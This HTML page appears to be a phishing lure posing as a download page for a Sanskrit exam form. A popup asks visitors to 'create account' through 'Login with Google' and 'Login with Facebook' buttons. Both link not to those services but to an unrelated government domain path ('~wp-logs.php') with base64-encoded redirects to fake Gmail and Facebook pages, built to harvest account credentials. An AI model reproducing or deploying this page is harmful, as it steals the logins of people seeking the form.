<!DOCTYPE html>
<html>
<head>

   <title>Sanskrit gyan pariksha form download</title>
   <style>
   
   body{
     background-color: cyan;
   }
   
.div {
  margin-top: 100px ;
  height: 1450px;
  background-image: url("form.jpg");
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}

#btn{
  background-color: #87CEEB ;
border: 2px solid black;  
border-radius: 5px;
font-size: 30px;
text-decoration: none;
color: black;
margin-left: 405px;
padding: 10px;
}

.div2{
margin-top: 30px;  
}


{box-sizing: border-box;}

/* Button used to open the contact form - fixed at the bottom of the page */
.open-button {
  background-color: #555;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  opacity: 0.8;
  position: fixed;
  bottom: 23px;
  right: 28px;
  width: 280px;
}

/* The popup form - hidden by default */
.form-popup {
  display: none;
  position: fixed;
  bottom: 0;
  right: 15px;
  border: 3px solid #f1f1f1;
  z-index: 9;
}

/* Add styles to the form container */
.form-container {
  max-width: 300px;
  padding: 10px;
  background-color: white;
}

/* Full-width input fields */
.form-container input[type=text], .form-container input[type=password] {
  width: 100%;
  padding: 15px;
  margin: 5px 0 22px 0;
  border: none;
  background: #f1f1f1;
}

/* When the inputs get focus, do something */
.form-container input[type=text]:focus, .form-container input[type=password]:focus {
  background-color: #ddd;
  outline: none;
}

/* Set a style for the submit/login button */
.form-container .btn {
  background-color: #04AA6D;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  width: 100%;
  margin-bottom:10px;
  opacity: 0.8;
}

/* Add a red background color to the cancel button */
.form-container .cancel {
  background-color: red;
}

/* Add some hover effects to buttons */
.form-container .btn:hover, .open-button:hover {
  opacity: 1;
}

#a{
  text-decoration: none;
  background-color: white;
  color: black;
  border: 2px solid black;
  border-radius: 4px;
}

#myForm{
  padding: 00px;
  margin-bottom: 800px;
  height: 900px;
  width: 2000px;
  
}

.form-container{
  
margin-left: 1350px;  
margin-top: 450px;
}

.form-container h1{
  
  margin: 10px;
  margin-bottom: 30px;
}

.row{
margin-left: 50px;  
}

.o{
  margin-left:90px;
  margin-top: 30px;
}
</style>
</head>
<script>
  
function run() {
  document.getElementById("myForm").style.display = "block";
}

function closeForm() {
  document.getElementById("myForm").style.display = "none";
}  
</script>
<body>

  <div class="div"></div>
  <div class="div2">
<button id="btn" onclick="run()">DOWNLOAD</button>

  </div>
  
  
  
  
<!-- A button to open the popup form -->

<!-- The form -->
<div class="form-popup" id="myForm">
  <form action="#" class="form-container">
    <h1>CREATE ACCOUNT TO DOWNLOAD THE FORM</h1>

<div class="row">
  <div class="col-md-3">
    <a id="a" class="btn btn-outline-dark" href="http://imduyv.gob.mx/~wp-logs.php/?url=L0dtYWlsX2cvP2k9MDlaUEw=" role="button" style="text-transform:none">
      <img width="25px" height="20px" style="margin-bottom:0px; margin-right:5px" alt="Google sign-in" src="https://upload.wikimedia.org/wikipedia/commons/thumb/5/53/Google_%22G%22_Logo.svg/512px-Google_%22G%22_Logo.svg.png" />
      Login with Google  
    </a> <br> <h4 class="o">OR</h4>
  </div>
</div>


<div class="row">
  <div class="col-md-3">
    <a id="a" class="btn btn-outline-dark" href="http://imduyv.gob.mx/~wp-logs.php/?url=Ly9tb2JpbGVfYmx1ZS9pbmRleC5waHA/JmFtcDtpPTA5WlBM" role="button" style="text-transform:none">
      <img width="<4></4>0px"  margin-left:"0px"; height="25px" style="margin-top:0px; margin-right:0px" alt="Google sign-in" src="fb.png" />
      Login with Facebook
    </a>
  </div>
</div>



<br><br>

    <button type="button" class="btn cancel" onclick="closeForm()">Close</button>
  </form>
</div>

</body>
</html>
